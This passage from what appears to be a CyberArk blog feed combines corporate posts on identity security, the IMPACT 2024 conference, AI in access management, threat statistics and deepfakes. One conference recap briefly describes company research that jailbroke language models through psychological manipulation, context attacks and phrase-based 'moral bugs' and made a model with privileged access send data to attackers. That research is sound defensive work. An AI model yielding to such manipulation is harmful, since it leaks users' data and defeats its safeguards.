Homomorphic encryption and confidential computing both show promise in enhancing privacy. However, as mentioned earlier, these technologies have yet to be widely adopted. Confidential computing is not easy to adopt and is not yet a multi-purpose technology. It is limited to some use cases, mainly in cloud-based encryption for data-in-use. As a result, they are far from being adopted at scale. In this case, the only way to ensure data confidentiality and privacy is by securing every human and machine identity that accesses sensitive data across your IT environment.

Identity at the Core of Privacy

Maintaining privacy by securing access for all identities involves managing access rights effectively for every identity throughout its lifecycle. The privacy teams outline access to resources for every identity based on the roles of every business function. Whether it’s sales representatives accessing customer data, HR professionals handling sensitive employee information, or IT managers overseeing system resources, it’s essential to uphold the principle of least privilege (PoLP) to ensure that only the right people have access to specific data, reducing the risk of unauthorized data exposure. Implementing comprehensive Identity and Access Management (IAM) controls and capabilities is necessary to secure access for all identities and maintain privacy.

Here are two examples:

  • An adaptive form of multi-factor authentication (MFA) can enable organizations to strengthen their security posture through additional checks to validate identities in multiple layers.
  • Automated lifecycle management can help organizations easily define and enforce each user’s unique role, responsibilities and access privileges.

Privacy and Cybersecurity: A Synchronized Act

I am convinced that cybersecurity enables privacy – and not vice versa. To illustrate this theory, let’s look at the relationship between the different layers of swimmers in a synchronized swimming “lift.” The base is a swimmer underwater at the bottom of a lift. The base swimmers provide the force for pushers to stand up explosively and thrust flyers, the top layer of this aquatic human pyramid.

Our industry’s privacy teams are the equivalent of the pushers, with a core strength of data privacy regulatory requirements and a thorough understanding of the law. The base swimmers are cybersecurity teams who harness their information technology (IT) background and technical skills to implement security controls according to the regulatory requirements outlined by the privacy teams (the pushers).

Without the pushers, cybersecurity teams (the base) will secure data and access to it, but not in accordance with applicable laws. As such, cybersecurity teams enable privacy teams to fulfill their responsibilities better. With the pushers and the base strong in their positions, the flyers are athletes thrust upward – or, for the sake of this comparison, the flyers are the average business user (or identities) – who can execute their daily tasks productively and securely while maintaining confidentiality and privacy.

When privacy and cybersecurity teams collaborate and align, it feels like a perfectly executed synchronized swimming performance with the three groups of athletes – the flyers, the pushers and the base – in perfect lockstep.

The Perfectly Synchronized Act of Privacy and Cybersecurity Teams

As easy as this act looks, it’s not – unless – it’s planned strategically and collaboratively. As much as synchronized swimming is a treat to behold, it’s a demanding sport with dangerous and challenging maneuvers. For cybersecurity teams, these challenges and difficulties translate to a changing regulatory landscape, evolving threat landscape, deepening digital ecosystem of third- and fourth-party providers and an increasing number of identities that have access to growing sensitive datasets, among other concerns.

However, our act as cybersecurity leaders and technologists can be a virtual treat in collaboration with the privacy teams and with a regularly evaluated risk framework.

All this talk about synchronized swimming has gotten me thinking of the Summer Games set to take place in France this year. I look forward to watching the swimming heats and synchronized swimming competitions this summer. While doing so, I’ll brainstorm how to actively and effectively coordinate with privacy teams to protect sensitive data for CyberArk and our customers. I kid you not.

I hope you’re inspired to do the same.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

 

]]>
IMPACT 2024: It’s Time for a Paradigm Shift in Identity Security https://www.cyberark.com/blog/impact-2024-its-time-for-a-paradigm-shift-in-identity-security/ Fri, 24 May 2024 16:36:39 +0000 https://www.cyberark.com/?p=191354

What a week! We just wrapped up CyberArk IMPACT 2024, the world’s largest identity security-focused conference. It was amazing to be joined by thought leaders and practitioners from around the world to talk about the present and future of identity security. Nashville provided a colorful, musical backdrop for this year’s event, which was the perfect combination of information exchange and networking in a dynamic, fun event experience.

Thank you to our customers, partners, employees and everyone who made the trip to Nashville! Your engagement and enthusiasm were palpable across the entire three days, and I could not be more excited and inspired about the road ahead. As I reflect on the many highlights, I’m filled with gratitude for this incredible community and energized by the meaningful work we’re doing together to create a safer digital world for all.

Embracing Change: Paradigm Shifts in Music and Identity Security

At IMPACT ’24, we talked about paradigm shifts – in music, we were in Nashville after all, and in identity security. There is no better example of an industry that has embraced paradigm shifts than the music industry. Over the past 25 years, we’ve all experienced firsthand the evolution of new technology, new access methods and new experiences when it comes to how we purchase and consume music.

When it comes to securing identities, a paradigm shift is also required. Every organization is facing new forces that are creating a rapid increase in the number and types of identities and increasingly complex hybrid cloud environments to secure. These forces are driving new attack methods, which are made even more sophisticated and effective by AI. We believe that to be secure, every identity, from workforce to IT, to developers to machine, needs the right level of privilege controls intelligently applied. Equally important, we need to provide these controls without getting in the way of productivity, efficiency and innovation. This is the paradigm shift that we must all make to keep our people and our organizations safe from cyberthreats.

Pull quote from CyberArk CEO Matt Cohen on the honor of being surrounded by customers and partners sharing CyberArk's vision for identity security (at CyberArk's IMPACT 24 conference)

CyberArk + Venafi: Securing Machine Identities at Scale

To tackle the growing challenge of securing machine identities at scale, we were thrilled to announce that we’ll be joining forces with Venafi, a leader in machine identity management. The combination of Venafi’s certificate lifecycle management, private public key infrastructure, IoT identity management and cryptographic code signing, with CyberArk’s secrets management capabilities, will enable organizations to keep machine-to-machine connections and communications secure. This acquisition marks a pivotal milestone for CyberArk and we look forward to leveraging our collective strengths to deliver end-to-end machine identity security to our customers once the deal closes.

In addition, there is no greater honor than sharing the IMPACT stage with cybersecurity leaders on the front lines. Our customers’ real-world stories of innovation and ingenuity inspired us while bringing today’s greatest identity security challenges into sharp focus. Security leaders from Healthfirst, Unilever and IHG Global talked about how they are applying privilege controls to meet the unique needs of users across their organizations. Dozens of other customers spoke at breakout sessions. Thank you to these wonderful customers for sharing your insights and learnings with the broader community.

A New Era of Productivity and Security with CyberArk CORA AI

We also shared some exciting news on the product front with new capabilities across our platform. Most notably, we introduced CyberArk CORA AI, a new set of AI-powered capabilities that will be embedded within our platform to make our customers more productive and more secure. Much more than a digital assistant, CORA AI will fundamentally transform how users interact with the CyberArk Identity Security Platform, reducing the time it takes to sift through human and machine identity data to analyze anomalies and apply next-level identity threat detection and response actions from hours to minutes.

IMPACT ’24 was by far our largest and most engaging conference ever. It was an honor to be surrounded by so many customers and partners who share our vision for identity security. Not to mention the wonderful CyberArk employees who contributed to deliver an amazing event experience.

The world is changing rapidly. We simply cannot expect the paradigms of the past to solve today’s problems, let alone prepare us for what’s to come. Our time in Nashville provided a glimpse into what’s possible when you flip the script – and how shifting paradigms can truly transform an industry. I’m incredibly excited for the journey ahead as we continue to shape the future of identity security together.

Next, on to IMPACT World Tour as we take the experience to cities around the world.

Matt Cohen is the CEO of CyberArk.

]]>
The Future of Identity Security: Insights from CyberArk IMPACT 24 https://www.cyberark.com/blog/the-future-of-identity-security-insights-from-cyberark-impact-24/ Wed, 22 May 2024 20:20:17 +0000 https://www.cyberark.com/?p=191312 Nashville skyline illustration, with abstract musical and identity security and machine identities notes.

CyberArk IMPACT 24 in Nashville was a week packed with firsts for me:

  • My first time in Nashville.
  • My first time at our flagship global event.
  • My first time being involved in a genuinely significant acquisition: Monday’s Venafi announcement.

And not to be too trite – IMPACT 24 is a conference, after all – it was a week packed with The New. Day One of IMPACT is typically a quieter day, with many side events and no keynotes, serving as the calm before the storm. This time, Day One began at 7 a.m. with the zero-to-sixty-mph-in-three-seconds news that CyberArk announced the $1.5 billion acquisition of machine identity management leader Venafi.

As well as sparking an immediate media frenzy, this news and what it means for identity security – particularly for securing machine identities – infused the whole IMPACT 24 event. CyberArk CEO Matt Cohen talked about it in terms of broken models and the need to change, to introduce new thinking and a new model. He drew a parallel with the record industry. He took us back to the days of buying a vinyl album from a physical store and listening to it all the way through*. He then reminded us of what happened to that industry and its once-major players when they stayed still. They waited for events to happen to them instead of driving the change, many soon ceasing to exist as a result. A guest speaker on Day Three perhaps put it best: “Waiting for something to occur is not a luxury that firms have anymore.”

Matt also discussed the need for a paradigm shift in how we secure identities, a framework that will create a better path to the desired result. Why is this necessary? We all face immense and growing identity challenges, and how we currently secure these identities is often siloed and inefficient. But they must be secured; it is critical to do so. As another speaker from a global consultancy firm bluntly stated, “Everything bad that happened to your organization started with a compromised identity.”

The Future of Identity Security: Harnessing the Power of GenAI

The proliferation of identities was a thread running through many of the IMPACT 24 talks from the CyberArk team and our customers and partners. Organizations have so much more to deal with today than in the quaint, dim-and-distant days of, say, five years ago. Security has moved from perimeter-based to identity-centric and can only be delivered effectively through the use of automation built on Zero Trust principles. In the succinct words of one of our customers on what multi-cloud means for his organization’s employees, their identities and access demands, “It’s global, it’s everywhere, it’s all hours.”

How is this new paradigm of identity security going to be delivered? New paradigms are not just about knowing where you want to get to – they must include how you get there – or they’re just hot air. GenAI was, of course, a key theme of the conference and will be one of the building blocks of this new model of securing human and machine identities. GenAI has changed our relationship with data, allowing us to interact with it more conversationally rather than simply searching for it. GenAI will play a pivotal role in attacks by enabling the democratization of advanced attacks. It will also be central to cyber defenses. At IMPACT 24, the announcement of CyberArk CORA AI represents, in part, how this new model will be delivered through a new set of AI-powered capabilities that, over time, will be embedded across the CyberArk Identity Security Platform.

A Look Back: (a Couple of) My Favorite IMPACT 24 Moments

I mentioned at the outset that this was my first time at our flagship U.S. conference. Our IMPACT World Tour events take place throughout 2024 and are a great way of bringing the experience closer to our customers, but Nashville is on a larger scale. Among the many aspects that I enjoyed:

   1. CyberArk Labs sessions are always a favorite of mine, particularly when VP of Cyber Research Lavi Lazarovitz presents. As usual, he didn’t disappoint at IMPACT 24. The big reveal included his team’s work on attacking AI models via malicious prompts. They used the privileged access of an AI model to send data to attackers and jailbroke large language models (LLMs). By taking advantage of their design flaws, they manipulated the LLMs to share information they were not supposed to. These included psychological manipulations, context attacks and moral bugs, where certain words and phrases overcome the LLM restrictions.

   2. One of the event’s highlights was the Day Three fireside chat with CyberArk VP of Brand Experience Anna Walsh, our Founder and Executive Chairman Udi Mokady and Robert Herjavec. Yes, that Robert Herjavec. Robert, of course, is the CEO of Cyderes and Shark Investor on ABC’s “Shark Tank.” The learnings of their formative years in the industry were poignant, from Robert talking his way into the IT industry to sell mainframes by offering to work for free to Udi’s early days at CyberArk selling the idea that leaving – metaphorically – the valuable stuff (critical data and assets) lying on a table in a locked house with an open window was a flawed concept.

Finally, IMPACT wouldn’t be IMPACT without the people who make it happen, from the event team to all our speakers, sponsors, partners and customers – a huge thanks to all of you.

*Yes, I still listen to albums all the way through.

Nick Bowman is director of media relations at CyberArk.

]]>
Predicting the Future of AI in Identity and Access Management https://www.cyberark.com/blog/predicting-the-future-of-ai-in-identity-and-access-management/ Tue, 21 May 2024 18:50:03 +0000 https://www.cyberark.com/?p=191141 Predictions AI iam

In the rapidly changing cybersecurity landscape, Identity and Access Management (IAM) is a critical pillar, safeguarding organizational data and access across different enterprise systems and platforms. As the head of CyberArk’s Artificial Intelligence Center of Excellence (AI CoE), I’m witnessing firsthand the transformative impact of artificial intelligence (AI) in this domain. AI is not just reshaping how we manage digital identities and access controls but also how we balance productivity and security.

After announcing the launch of CyberArk’s AI CoE last September, my team and I dedicated ourselves to understanding the needs of our customers and the industry. We conducted interviews, analyzed market trends and made predictions. At the same time, we began working on several imperative AI initiatives. Just over six months later, we have even more AI initiatives underway and many more in the planning stages.

This week, I’m participating in CyberArk’s annual IMPACT conference, where our customers and partners will preview CyberArk CORA™ AI*, the first wave of AI-powered capabilities that will be embedded across our Identity Security Platform and that we plan to release this year. In this post, I will share insights into our current work and the direction we envision for the future. While some predictions are involved, it’s important to note that they do not reflect our product roadmaps.

AI and the Security-Productivity Balancing Act

When developing AI-based capabilities for IAM systems, we often must choose between improving user productivity and enhancing security measures. Some AI capabilities streamline user operations and improve efficiency, while others aim to tighten security.

From conversations with customers, I understand they primarily see AI-based features as productivity boosters. These features help them work more efficiently and shorten the learning curve. Some AI-based features, like chatbots, focus on productivity, while others, like policy recommendation engines, combine productivity with security. These features can streamline users’ work and provide collective or heuristic-based knowledge, guiding them to make better decisions and enhance security.

Other capabilities, such as discovering and alerting suspicious activities, lean even further toward the security end of the spectrum. But, even in this case, there’s an argument that these capabilities also increase user productivity and effectiveness.

The Three Pillars of AI in IAM and What’s on the Horizon

The author's AI in IAM predictions, as illustrated in graphical format.

As charted in the illustration above, we’ve categorized AI in IAM into three main pillars for this blog post, each blending productivity enhancements with security improvements. While securing GenAI is an exciting topic, it only relates tangentially to IAM, so I’m not discussing it in this blog. Looking into the future, we can expect a wide range of technologies to emerge in each category, from the near and achievable to the more distant and complex.

So, with my (cyber) crystal ball in hand, to follow are my predictions (and my predictions only) for what will happen in each area of AI in IAM over the next few years.

1) Chatbots and AI Assistants

Imagine a world where intelligent AI assistants guide every interaction with your IAM system. Information answers retrieval, context-specific recommendations and even system configuration or system debugging are delivered instantly and accurately. AI-driven chatbots and assistants in IAM will soon be able to provide not just text-based Q&A interactions but also create context-aware recommendations that include integrations with third-party systems.

These AI functionalities are built to understand users’ individual needs and the unique circumstances of different customers, making operations more intuitive, efficient and tailored to the specific situation. Whether answering queries, suggesting next steps or executing commands on the user’s behalf, AI assistants are set to become indispensable in the IAM toolkit.

Here’s what’s likely to roll out in the next few years in this area of AI in IAM:

Predicted Release: 2024

  • Documentation chatbots will continue to evolve and improve their ability to answer generic questions based on the body of documents, knowledge base and other sources of information.
  • Assistant chatbots will understand the user’s natural language and run commands for them, but at a much deeper and more complex level than what we’ve seen thus far. For example, some user queries may involve executing a chain of API calls that requires correctly understanding the necessary parameters for each subsequent call and how to provide the appropriate response to the user. These assistants will be simple to start, but as time goes by, they will add more and more capabilities and support ever more complex use cases.

Predicted Release: 2025-2026

  • Context-aware chatbots and assistants will be more knowledgeable about individual user circumstances than their current AI predecessors. Rather than providing the same outputs to different users, these next-gen chatbots will “know” things about you and tailor their responses accordingly. For example, they will be able to identify if the user is new to the system, which operations they typically perform and which services they subscribe to. Additionally, these assistants will consider broader context, such as progress in onboarding or completing a to-do list.

Predicted Release: 2027-2030

  • Automatic issue detection and guided remediation will enable AI chatbots and assistants to become more proactive, suggesting actions and next steps. Whether it’s the next item on your to-do list or resolving an error on your screen, these assistants will increasingly offer solutions to problems and tasks – asking only for your confirmation.

2) Access Policies

The integration of AI tech is poised to significantly transform the definition of access policy. Algorithms will generate dynamic least privilege access policies, ensuring users have only the access necessary for their roles. These policies will be based on natural language and intent rather than technical language currently representing this intent.

This shift means that IAM administrators will transition from hands-on operators to strategic supervisors who set high-level guidelines, accept or update suggested policies and handle anomalies.

This change should accelerate task completion and reduce the technical knowledge required for policy managers within organizations. Yet, it raises an interesting question: Will this efficiency come at the expense of precision (for instance, will you get used to unquestioningly accepting the suggestions), or will it enhance security? The trend points toward the latter, considering simpler, AI-generated policies tend to be less prone to human error and misconfiguration.

Here’s what to look for in the next few years:

Predicted Release: 2024

  • Policy recommendations based on best practices or the collective knowledge of other customers. You can expect to see lots of these soon.

Predicted Release: 2025-2026

  • Intent as policy is one of my most anticipated and revolutionary AI promises to the world of IAM (and other sister industries that handle multiple access policies). We’ll see natural language used to define new and explain existing policies. The intent will become the policy. For example, an access policy rule could look like this: “Give John SRE-level access to his team’s AWS production account for the upcoming two hours.” Or, “Don’t allow non-admin users to see payment-related fields in the CRM app.”

Predicted Release: 2027-2030

  • Automatic policy creation is the logical next step after policy recommendation. Such policies can rely on history or heuristics for their creation.

3) Risk-based Access

The third pillar focuses on the nature of access itself. As AI makes access to systems more personalized and contextualized, access becomes more dynamic and transparent. This means fewer repetitive logins and multi-factor authentication (MFA) prompts during normal operations, leading to smoother workflows and less user frustration.

Here’s what I predict we’ll see in this area in the near and not-as-near future:

Predicted Release: 2024

  • Activity summaries and security insights will be generated from the user’s interactions with systems, which produce a digital trace (like a video recording, a log or an audit record). Generative AI (GenAI) will transcribe and summarize this trace into human-readable text. Additionally, GenAI will alert you if you perform a risky operation during the session.

Predicted Release: 2025-2026

  • Behavioral profiling and threat detection will work together to create and continually update risk profiles for workloads and users. These profiles will be based on their activity within the systems, allowing for the creation of specific profiles for each workload and user. As a result, more granular and precise risk-level management and threat detection will be achievable.

Predicted Release: 2027-2030

  • Automated threat prevention will be the next natural step following the arrival of threat detection mechanisms. It will likely take many forms, such as stopping a suspicious session or suspending or requiring additional login measures for a questionable user.
  • Automatic policy creation (extension): With the ability to maintain user-specific profiles, systems will use this data to create user-specific and context-specific behavior, resulting in more personalized and dynamic access policies.

The Impact of AI on IAM: A Look Into the Future

Integrating AI in IAM is an ongoing journey toward creating more secure, efficient and user-friendly systems. As we look to the future, the focus will be on how AI can seamlessly integrate into the core areas of IAM to provide increased security and productivity.

At CyberArk’s AI CoE, our mission is to drive state-of-the-art technological innovation in our products and create value for our customers by meeting today’s challenges and future-proofing against tomorrow’s cyberthreats. We strive to seamlessly integrate AI into the core areas of IAM, enhancing security and productivity. As we continue exploring the exciting possibilities, we are grateful for our customers and partners in this journey toward a more secure and efficient future.

Together, we can achieve great things.

Daniel Schwartzer is CyberArk’s Chief Product Technologist and the leader of CyberArk’s Artificial Intelligence Center of Excellence.

*Learn more about CyberArk CORA AI.

Editor’s note: For more insights from Daniel Schwartzer on this subject and beyond, check out his appearance on CyberArk’s Trust Issues podcast episode, “AI Insights: Shaping the Future of IAM.” The episode is available in the player below and on most major podcast platforms.

]]>
The Growing Threat of Identity-Related Cyberattacks: Insights Into the Threat Landscape https://www.cyberark.com/blog/the-growing-threat-of-identity-related-cyberattacks-insights-into-the-threat-landscape/ Thu, 16 May 2024 17:33:48 +0000 https://www.cyberark.com/?p=190723 Identity-themed abstract feature image accompanying CyberArk 2024 Identity Security Threat Landscape teaser blog.

The last 12 months have witnessed a rapid-fire round of innovation and adoption of new technologies. Powerful new identities, environments and attack methods are shaping the quickly changing cybersecurity threat landscape, rendering it more complex and causing the diffusion of risk reduction focus. New CyberArk research indicates that the rise of machine identities and the increasing reliance on third- and fourth-party providers are deepening the existing threats and creating novel vulnerabilities.

The CyberArk 2024 Identity Security Threat Landscape Report, released today, surveyed 2,400 identity-related cybersecurity experts and decision-makers across 18 countries to provide deep insights into the evolving threat landscape. The report reveals that an overwhelming majority (93%) of organizations have experienced two or more breaches due to identity-related cyberattacks. These organizations anticipate the total number of identities to increase more than 2.4 times in the next 12 months.

Several factors contribute to this surge in identity-related attacks, including the rise in volume and sophistication of cyberattacks perpetrated by both skilled and unskilled bad actors who utilize generative AI (GenAI) to amplify their attacks. These threat actors target an already intricate and expanding digital ecosystem, exploiting unsecured identities to gain access to their victims’ environments. To that end, the report finds that nearly all (99%) organizations affected by identity-related attacks suffer negative business impacts.

Read on to get a look at some key trends outlined in the report.

The Perils of GenAI

GenAI is, of course, not new to organizations or bad actors. In fact, 99% of organizations use AI-powered tools in their cybersecurity initiatives, while bad actors also use GenAI to increase the volume and sophistication of their attacks. As a result, 93% of organizations anticipate a negative impact from AI, expecting an increase in AI-augmented malware, phishing and data breaches. In the last 12 months, nine out of 10 organizations experienced a breach due to phishing or vishing attacks. With AI-powered cyberattacks becoming more challenging to detect, the likelihood of widespread organizational breaches increases.

Deepfake videos and audio generated by GenAI are becoming increasingly difficult to discern. Yet, in the B2B world, over 70% of respondents are confident that their employees can identify deepfake content featuring their organizations’ leaders. These insights suggest complacency among respondents, likely fueled by an illusion of control, planning fallacy – or just plain human optimism. The full extent of the potential damage that GenAI-augmented attacks can inflict and the damage multiplier of compromising the data models feeding defensive GenAI remains unknown, and our vulnerability to it may be greater than we realize. These responses underscore the need to plan for more advanced future attacks and invest in protecting the data models used by machine intelligence and extending strong governance to this new AI identity.

New Era: Rise of the Machines

Nearly half of the 2,400 surveyed cybersecurity experts anticipate a threefold increase in machine identities, which are primarily under-secured and over-privileged, driving this growth. Ongoing automation efforts at scale and pervasive cloud computing further exacerbate the proliferation of vulnerable machine identities. The increase in the total number of these identities is neither new nor surprising. However, what is surprising (and concerning) is that nearly two-thirds (61%) of surveyed organizations have an exceedingly narrow definition of “privileged user,” which solely applies to human identities with access to sensitive data.

Privileged user human

This definition contradicts our respondents’ observations, with nearly three-quarters (68%) indicating that up to 50% of all machine identities have access to sensitive data.

Still, their organization’s definition of a “privileged user” reveals a massive gap in excluding machine identities. Organizations report that they are primarily focused on securing human identities, which is a cause of concern in securing machine identities. They also report that a security incident requires significant manual effort to address or remediate.

Chain Reaction: Third and Fourth-party Risks

The report also highlights a lack of rigorous focus on vendor risk management despite the expanding web of our digital ecosystems. In the next 12 months, 84% of organizations plan to employ three or more cloud service providers (CSPs), and projections show an 89% annual increase in the number of SaaS applications, compared to 67% in 2023.

It’s crucial to understand that your network of third-party providers extends beyond CSPs and SaaS providers to include service providers, integrators, hardware and infrastructure suppliers, business partners, distributors, resellers, telecommunications and other external entities that enable digital business. Third- and fourth-party breaches can quickly cascade to your organization, creating a multiplier effect on risk.

The report finds that while 91% of respondents are concerned about third-party risks and 83% about fourth-party risks, vendor risk management remains a low priority for post-breach investments. It’s important to note that bad actors often employ a ‘buy one, get one’ approach, targeting multiple victims through double software supply chain and multi-tenant environment attacks. This means if bad actors target your third- or fourth-party providers, they could put your organization at risk. As such, regular vendor risk assessments and heightened vendor accountability are crucial. Likewise, this vendor accountability and risk assessment strategy should extend to cybersecurity vendors, too.

Cyber Debt: ‘Shiny Object’ Syndrome and a Blind Spot

Facing growing threats, organizations may prioritize adopting the latest technologies over foundational controls to address cybersecurity challenges. However, this can lead to the accumulation of cyber debt, where organizations incur significant costs and risks by neglecting existing vulnerabilities. This shift in behavior and negative results shows a need for consistency across foundational and new attack paths and tooling. According to the report, core social engineering attacks like phishing and vishing remain highly effective, resulting in breaches and substantial financial losses for nine out of 10 organizations.

Organizations must balance addressing existing vulnerabilities and adopting new technologies. Despite the complexity and challenges inherent in the future of cybersecurity, organizations can mitigate risks by staying informed and adopting a proactive approach to risk management that is consistent across all identities and environments.

Identity Security: The Key to a Robust Cybersecurity Posture

In today’s fast-paced world, where challenges abound, every defense erected becomes a new tower that bad actors seek to conquer. Our most significant advantage against these threats lies in our ability to collaborate. As Michael Jordan famously said (I’m told…), “Talent wins games, but teamwork and intelligence win championships.” Our collective defense extends beyond immediate colleagues to encompass our entire organization and third- and fourth-party providers. Securing every identity across the IT environment is paramount, necessitating a new cybersecurity model centered on identity security. The future of security starts with identity.

Download the CyberArk 2024 Identity Security Threat Landscape Report for comprehensive insights into navigating the evolving cybersecurity landscape.

Brandon Traffanstedt is a senior director in CyberArk’s Field Technology Office.

]]>
CIO POV: Navigating the Deepfake Pandemic with Proactive Measures https://www.cyberark.com/blog/cio-pov-navigating-the-deepfake-pandemic-with-proactive-measures/ Tue, 14 May 2024 18:07:59 +0000 https://www.cyberark.com/?p=190651 Navigating the Deepfake Pandemic with Proactive Measures

We’re in the throes of another pandemic, but this time, it’s not transmitted through the air – it spreads with just a click.

Welcome to the world of deepfakes.

While COVID-19 significantly impacted our physical and mental well-being, deepfakes affect our minds differently. Their influence is causing confusion, mistrust and a distorted perception of reality, both personally and globally. In this crucial election year – with over 4 billion people across 60 countries gearing up to choose their leaders – deepfake technology is being weaponized to spread misinformation, influence global events and shape the course of history.

Voter influence campaigns fueled by deepfake videos will spread across social media platforms with a mere click. In the midst of elections now, India is grappling with an onslaught of deepfakes. Moreover, deepfakes are infiltrating B2B environments, exemplified by a recent fraud case in Hong Kong that incurred significant financial losses for a financial firm.

Further chaos will ensue as GenAI races toward super-fakes.

Mitigating the Risks of GenAI

Ongoing innovation in GenAI will likely render the average person incapable of discerning authentic content from deepfakes. Currently, there are no tools capable of identifying and mitigating this threat. This gap will put added pressure on cybersecurity teams already pressed with limited resources and budgets to defend against the existing threat landscape. However, here are three measures we must consider now to address this modern risk:

   1. Establishing Regulations Quickly

Regulations, though not foolproof, serve as guardrails against unchecked technological innovation. The absence of regulations, as witnessed in the case of social media, allows for rampant issues like misinformation and polarization. Governments worldwide, mindful of not making the same mistakes they made with social media, are swiftly enacting regulations to hold both vendors and users of GenAI accountable. Examples from 2023 include the EU AI Act and the U.S. Executive Order (EO) on the Safe, Secure and Trustworthy Development and Use of Artificial Intelligence.

The current regulations are – to some extent – slowing down the pace at which vendors release GenAI-powered tools to the market. For example, OpenAI is delaying the release of Sora AI to ensure content provenance and enable users to identify real vs. increasingly real-looking but fake videos.

   2. Addressing Misplaced Confidence and the Need for Self-Regulation

AI-driven phishing and deepfake scams are already working. In February, a Hong Kong-based multinational company lost HK $200 million (U.S. $25.6 million) to a deepfake scam that fooled a clerk into executing a financial transaction discussed during a virtual meeting where every attendee – even the chief financial officer (CFO) – was fake. Unfortunately, this first-of-its-kind AI heist (and worst day ever for the clerk) will not be the last. AI-powered phishing attacks will soon target and potentially breach nearly all organizations. In addition to this dire forecast, the report forecasts a steep rise in GenAI-powered phishing that will be harder to detect because of the sophistication and scale of the attacks.

Yet despite the growing threat of AI-driven phishing and deepfake scams, there’s a widespread misconception among employees regarding their ability to identify deepfakes. Our recent survey of 4,000 U.S. office workers finds that over 70% of employees (yes, you read that correctly) are largely confident in their ability to identify a deepfake video or audio of the leaders in their organization.

It’s a bad bet. This misplaced confidence underscores the need for rigorous fact-checking and self-regulation. Individuals must verify information from multiple trusted sources and exercise caution, particularly in high-stakes scenarios. And if you can’t fact-check it with numerous trusted sources, don’t believe it.

   3. Tackling the Debilitating Lack of Tools

Among other notable executives to make bullish statements about AI, JP Morgan Chase CEO Jamie Dimon recently said that AI could be as impactful as electricity. And who can fault them for making such statements? After all, GenAI boasts over a billion users in just a matter of months. No other technology has seen such unprecedented adoption.

I’m excited about AI, too.

However, the unchecked proliferation of GenAI poses significant challenges for organizations, including the need for more effective training and oversight. GenAI tools learn from vast datasets, raising concerns about inadvertently sharing sensitive data. Moreover, some GenAI models inherently lack adequate cybersecurity safeguards – controls too complicated to configure – leaving organizations vulnerable to exploitation by malicious actors. It’s particularly concerning that the number of GenAI tools that can generate deepfakes is increasing, but tools that can detect and prevent them are too few or next to non-existent.

As a leader, I sympathize with my peers facing the same ordeal who still must find ways to maintain a robust security posture.

What Your Organization Can Do to Protect Against Deepfakes

The good news is that there are some things organizations can do now to protect against deepfakes. These actions include:

  • Identify and train external-facing employees who interact with customers and may have access to sensitive information. For example, support and services staff should be trained to ask additional questions to verify whether the external caller is a human or a deepfake.
  • Educate all employees on the risks of engaging with unverified content and discourage amending or amplifying such content.
  • Prioritize investment in responsible and ethical AI practices, particularly during times of budget cuts.
  • Hold AI vendors accountable by embedding language in contracts to review capabilities periodically and ensure alignment with expectations.
  • Foster collaboration between employees and leadership to address gaps in perception and enhance awareness of deepfake threats. You can start by socializing and discussing our Identity Security Threat Landscape Report findings with them (my gift to you!).

As we navigate the uncharted territory of GenAI, collaboration, vigilance and proactive measures are essential to combat the threat of deepfakes. Let’s work together to ensure that GenAI shapes a future where technology is a force for good rather than a pervasive pandemic of misinformation.

Don’t wait – take action now to protect your organization from the dangers of deepfakes.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

]]>
CyberArk at 25: Udi Mokady on Milestones, Identity Security and Humility https://www.cyberark.com/blog/cyberark-at-25-udi-mokady-on-milestones-identity-security-and-humility/ Fri, 10 May 2024 13:32:11 +0000 https://www.cyberark.com/?p=190565 CyberArk at 25

Let’s head back for a moment to when some of us were partying like it’s 1999, in 1999. Among that year’s notable milestones were the release of The Matrix, the introduction of the euro – and the impending clock turn to 2000 (aka Y2K), which propelled prophylactic tech upgrades far and wide. Simpler times – at least in retrospect.

Somewhere amid the Czech Republic, Hungary and Poland joining NATO and “Hotmail hacking,” the company that now underwrites this blog debuted in the spring of 1999. CyberArk launched in a small sublet office outside Tel Aviv with a digital vault solution and a handful of employees. Soon after that came U.S. expansion and a rising focus, born from customer need, on securing privileged access – initially for IT admins.

CyberArk would soon become instrumental in pioneering the privileged access management (PAM) market and continuously driving its evolution. With the advent of multi-cloud, hybrid working and the dissolving of the security perimeter that followed, what began with IT admins expanded to the wider workforce and all other human identities, as well as bots and applications – all with degrees of sensitive access that need to be managed, monitored and controlled. Privileged credentials are everywhere around us, and attackers, of course, still relentlessly attempt to compromise privileged credentials and use them to move laterally throughout networks to reach intended targets.

Then identity security entered the fold – centered on PAM – making it easier for organizations to protect themselves against advanced cyber threats by securing all human and non-human identities, accessing all resources from every location. CyberArk established the category, and identity security has quickly become essential to extensive digital initiatives that drive businesses forward.

Critical to the company’s rise, continuous innovation and business transformation is co-founder Udi Mokady. Propelled in large part by his vision, under Mokady’s leadership, CyberArk has grown to over 3,000 employees and offices in 16 countries. And it was just last year when he shifted to a new executive chairman role after serving as the company’s CEO for over 18 years, including the first eight-plus years since he took the company public in 2014.

To commemorate CyberArk’s 25th anniversary, Mokady recently sat down with me for an episode of our Trust Issues podcast. It’s a wide-ranging discussion that looks back, looks forward and dips into philosophies and lessons learned. In the episode, Mokady reflects on the significance of CyberArk’s quarter-century milestone, its ongoing growth and innovation’s pivotal and enduring role in that growth. He also talks about the ever-evolving threat landscape and how the company has, in turn, grown and scaled to meet it while maintaining its culture and values.

The following excerpts from the podcast have been edited and condensed for clarity.

Udi Mokady culture

On CyberArk’s early days: “There’s no way in the world that I envisioned getting to where we are today. This would have been a crazy dream at the time when we were in a sublet in Israel.”

On the 2014 IPO: “Going public created a platform we could ride on to build a long-lasting company … It was a way to show our customers and partners that we were going to be around for the long haul. It was a way to earn the right to say that we were built to last … Everything we did was about thinking long-term and doing what was best for the company in the long-term. Going public was good for business and it was good for our brand.”

On the transition from CEO to Executive Chairman: “It’s been a wild year. I’d been CEO of CyberArk for more than 18 years until we decided to do this transition. I turned it over to Matt Cohen, who is a superb CEO, so that I can focus on things that are strategic to CyberArk. It’s been a great transition, and I think we’re writing a case study of a founder/CEO transitioning to another CEO while the founder stays connected to the company, customers, partners, culture and employees.

